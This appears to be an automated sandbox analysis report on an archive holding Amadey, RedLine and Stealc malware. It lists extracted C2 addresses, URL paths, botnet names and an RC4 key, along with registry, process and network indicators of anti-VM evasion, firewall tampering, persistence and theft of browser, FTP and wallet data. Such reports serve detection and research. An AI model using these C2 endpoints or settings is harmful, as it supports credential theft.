amadey | d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4

Resubmissions

13/07/2024, 00:45

240713-a4kywayaqj 10

12/07/2024, 23:32

240712-3jb5fsvhmn 10

Analysis

max time kernel
2699s
max time network
2693s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
12/07/2024, 23:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

archive.zip
Size

14.0MB
MD5

aa3be7accc9a612ce95fcede2a64d791
SHA1

76bab53214bef8715658e47a01e14b9efc91cea9
SHA256

d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4
SHA512

dc232e6a0588161bd4b5decd3311a3ad1b5e58f723fa8ae7065ee3fa538fd432f4ef8bb857a3be372da97e62c49584041b94a4219ef8eae954491e963f09ecb4
SSDEEP

393216:WxovLlzWh46e8jm2KaxKhHK2VKaiKdWKn9KK:aov5246e8jjKaxKhHK2VKaiKdWKn9KK

Score

10^/10

amadey redline stealc 4dd39d hate logsdiller cloud (tg: @logsdillabot)discovery evasion execution infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

LogsDiller Cloud (TG: @logsdillabot)

77.105.135.107:3445

Extracted

Family

stealc

Botnet

hate

http://85.28.47.30

Attributes

url_path
/920475a59bac849d.php

Extracted

Family

amadey

Version

4.30

Botnet

4dd39d

http://77.91.77.82

Attributes

install_dir
ad40971b6b
install_file
explorti.exe
strings_key
a434973ad22def7137dbb5e059b7081e
url_paths
/Hun4Ko/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies firewall policy service 3 TTPs 3 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Setup.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Setup.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	Setup.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/4468-251-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 42 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	JJECAAEHCF.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
289	5252	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
236	powershell.exe
5532	powershell.EXE
5844	powershell.EXE
4768	powershell.exe
5872	powershell.exe
4208	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 64 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	JJECAAEHCF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation	OklvlTo.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Control Panel\International\Geo\Nation	AXChDNl.exe

Executes dropped EXE 64 IoCs

pid	Process
1916	cFb2c7uKqYcOaECU8XsTAIef.exe
2972	Klk_ndJuZUINtD72UfY7IaBv.exe
1096	dz_LhQg5VnMy0wlI_6dK0bLe.exe
3980	KAIgHVGHtDFBzfjGkrU7kU8s.exe
2848	cJGyky9EhCckJumZf6fkM6G5.exe
2324	vmr4hdyC4X94dgX9Bh3X3e0n.exe
4992	6AzFaABBWzIB3fzN1U16jtOf.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
3724	1vI2dSu9Otp3tPl9bmA85PJf.exe
564	5XopSKg9PUSZohSIWN2v9xOT.exe
3164	yhHzUVDC2pAw9goJepU_qORY.exe
200	Klk_ndJuZUINtD72UfY7IaBv.tmp
1032	Install.exe
1252	Install.exe
2636	goldenmusicalvariety32_64.exe
5104	Install.exe
1492	Install.exe
1524	goldenmusicalvariety32_64.exe
5056	JJECAAEHCF.exe
4208	explorti.exe
1472	eqtpkqwqodik.exe
4824	67f535e337.exe
2212	b9fcde3053.exe
5180	Install.exe
5204	Install.exe
5224	explorti.exe
5756	BFCFBFBFBK.exe
6004	KFIJJJEBGC.exe
6072	OklvlTo.exe
648	AXChDNl.exe
3512	explorti.exe
5528	explorti.exe
3480	explorti.exe
5692	explorti.exe
5240	explorti.exe
6004	explorti.exe
5308	explorti.exe
1548	explorti.exe
3580	abQaeBLwmX9V57tLKTE3eOuX.exe
6036	av_cOAXWNrelQa039CGbm0A1.exe
4912	IRrr6YljmO8hEIxi45BS9F3G.exe
5448	4Iy1KUXaumS5KWIhCg2YizTi.exe
1868	6_8BpX05xBxPNdxoMR3fjLwI.exe
5832	kJjL0w6C70s0bwCeRI5o95qa.exe
5504	cRS5O_os57KVEKl2I6n_mlOZ.exe
2364	sxM96ISlNbOtGCb6tmhTPqMM.exe
6048	7NybowgkTtFNZ6zV5tAShfiu.exe
1784	av_cOAXWNrelQa039CGbm0A1.tmp
5108	eqtpkqwqodik.exe
1892	explorti.exe
1304	explorti.exe
1848	explorti.exe
4896	explorti.exe
976	explorti.exe
2016	explorti.exe
6036	explorti.exe
6016	explorti.exe
4948	explorti.exe
2836	explorti.exe
5324	explorti.exe
3324	explorti.exe
4912	explorti.exe
5076	explorti.exe
3876	explorti.exe

Identifies Wine through registry keys 2 TTPs 42 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	JJECAAEHCF.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1210443139-7911939-2760828654-1000\Software\Wine	explorti.exe

Loads dropped DLL 9 IoCs

pid	Process
200	Klk_ndJuZUINtD72UfY7IaBv.tmp
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
4528	QwpLixYOI92BLmCZFEhE6Mbs.exe
3656	MSBuild.exe
3656	MSBuild.exe
2124	MSBuild.exe
2124	MSBuild.exe
5252	rundll32.exe
1784	av_cOAXWNrelQa039CGbm0A1.tmp

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	141.98.234.31

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	OklvlTo.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	OklvlTo.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	AXChDNl.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	OklvlTo.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
50	iplogger.org
65	iplogger.org
297	iplogger.org
387	iplogger.org

Looks up external IP address via web service 10 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	api.myip.com
9	api.myip.com
10	ipinfo.io
298	api.myip.com
320	ipinfo.io
346	api.myip.com
347	ipinfo.io
2	ipinfo.io
431	api.myip.com
432	ipinfo.io

Power Settings 1 TTPs 16 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3672	powercfg.exe
708	powercfg.exe
3348	powercfg.exe
2384	powercfg.exe
5560	powercfg.exe
3980	powercfg.exe
2800	powercfg.exe
1220	powercfg.exe
5204	powercfg.exe
1816	powercfg.exe
4404	powercfg.exe
2636	powercfg.exe
1620	powercfg.exe
2112	powercfg.exe
3680	powercfg.exe
5400	powercfg.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000100000002aa7e-725.dat	autoit_exe

Drops file in System32 directory 47 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE	OklvlTo.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	OklvlTo.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	AXChDNl.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199	OklvlTo.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437	OklvlTo.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	Setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057	OklvlTo.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04	OklvlTo.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	Setup.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	Install.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057	OklvlTo.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	Setup.exe
